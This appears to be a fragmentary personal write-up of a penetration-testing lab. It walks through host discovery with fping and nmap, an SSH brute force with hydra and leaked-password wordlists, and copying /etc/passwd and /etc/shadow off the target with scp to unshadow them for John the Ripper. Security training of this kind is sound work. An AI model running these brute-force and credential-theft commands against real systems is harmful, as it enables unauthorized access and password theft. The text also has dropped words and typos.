The lab is divided in two main parts:
- Network authentication cracking
- Bruteforce and password cracking
In the first part of the lab you will have to use different network authentication cracking techniques and tools against services available on the target machine.
Once valid credentials have been found, it is time to download the passwords stored on the remote system and use John the Ripper to crack them!
I'm on network
Discover live hosts on the network with
fping -a -g 192.168.99.0/24
192.168.99.22 is alive.
nmap -sC -sV -v 192.168.99.22
I guess we have to brute force both the username and the password of the ssh service. Not so sure about the telnet one. Let's
hydra the target's ssh service.
hydra -L /usr/share/security/wordlists/ncrack/minimal.usr -P /usr/share/security/wordlists/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f ssh://192.168.99.22
Username and password found.
The same process can be used to exploit telnet service.
Let's ssh into the target.
Successfully logged in.
Let's download the password file and crack them use john.
Since python and python3 are not present on the server. Les't
shadow file to local.
scp email@example.com:/etc/passwd . scp firstname.lastname@example.org:/etc/shadow .
sysadmin cannot download
shadow file. Maybe I didn't get the root account. I ran hydra against ssh again using the
rockyou-15.txt password file.
Now I can download the
john the password files. First
unshadow passwd shadow > unshadow.txt
Time elapsed, 1 hour 40 minutes.